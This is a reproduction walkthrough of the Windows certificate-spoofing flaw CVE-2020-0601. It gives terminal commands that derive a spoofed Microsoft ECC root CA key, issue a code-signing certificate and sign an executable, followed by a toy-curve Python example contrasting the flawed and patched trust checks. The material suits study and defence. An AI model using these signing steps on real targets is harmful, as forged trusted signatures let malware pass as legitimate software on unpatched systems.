Windows certificate vulnerability CVE-2020-0601

Affected versions:
Windows 10
Windows Server 2016/2019
Applications that rely on the Windows CryptoAPI
Viewing Windows certificates
To view the local Windows certificate store, press Win+R and run certmgr.msc.
Here you can see the system's default ECC-signed root certificates; pick any one and export it:
Double-click the certificate to see its details:
Reproduction:

// Install ruby
a@a-virtual-machine:~$ sudo apt install ruby
// If apt reports that another process holds the lock:
//   ps -A | grep apt        list the running apt processes
//   sudo kill -9 <PID>      kill that process
// Generate the spoofed CA private key spoofed_ca.key from the exported Microsoft ECC root certificate
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
// Generate the self-signed spoofed CA certificate spoofed_ca.crt
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa
Email Address []:aa
// Generate the leaf private key cert.key
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
// Generate the certificate signing request cert.csr
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
// Issue the leaf certificate cert.crt, signed by the spoofed CA
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
// Bundle key and certificates into the PKCS#12 file cert.p12
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
// Sign the executable, producing python_signed.exe
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe

Command 'osslsigncode' not found, but can be installed with:

sudo apt install osslsigncode

a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密碼: 
正在讀取軟件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
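The check that CVE-2020-0601 broke: before the patch, CryptoAPI matched a certificate's issuer against a cached ECC root by the public key point alone and trusted the curve parameters carried in the certificate, which is what main.rb above takes advantage of. The following is an added example, not part of the original post or of the CurveBall repository: on a constructed toy curve over GF(97) it shows how a key pair with a substituted base point reproduces the root's public point, and the parameter-complete comparison that rejects it (all names and values are constructed for illustration).

```python
# Added example: a toy curve over a small prime, constructed for illustration only.
P_MOD, A, B = 97, 2, 3          # y^2 = x^3 + 2x + 3 over GF(97)
G = (3, 6)                      # trusted base point; 5*G is the point at infinity
INF = None                      # point at infinity

def ec_add(p1, p2):
    """Affine point addition (handles doubling and the identity)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF                          # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    return (x3, (lam * (x1 - x3) - y1) % P_MOD)

def ec_mul(k, pt):
    """Double-and-add scalar multiplication k*pt."""
    acc = INF
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def spoof_generator(q, d_prime, n):
    """CVE-2020-0601 in miniature: from the public point q and the group order n,
    pick any private key d_prime and set g' = d_prime^-1 * q, so d_prime * g' == q."""
    return ec_mul(pow(d_prime, -1, n), q)

def naive_match(trusted, presented):
    """Pre-patch behaviour: the root is 'recognised' by its public point Q alone."""
    return trusted["Q"] == presented["Q"]

def strict_match(trusted, presented):
    """Patched behaviour: every domain parameter must match, not just Q."""
    return all(trusted[k] == presented[k] for k in ("p", "a", "b", "G", "n", "Q"))

if __name__ == "__main__":
    root = {"p": P_MOD, "a": A, "b": B, "G": G, "n": 5, "Q": ec_mul(2, G)}
    forged = dict(root, G=spoof_generator(root["Q"], 3, root["n"]))   # d' = 3
    print(ec_mul(3, forged["G"]) == root["Q"], naive_match(root, forged), strict_match(root, forged))
```

Running the block prints `True True False`: the forged parameters reproduce the root's Q, the point-only comparison accepts them, and the full-parameter comparison rejects them.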

References:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673
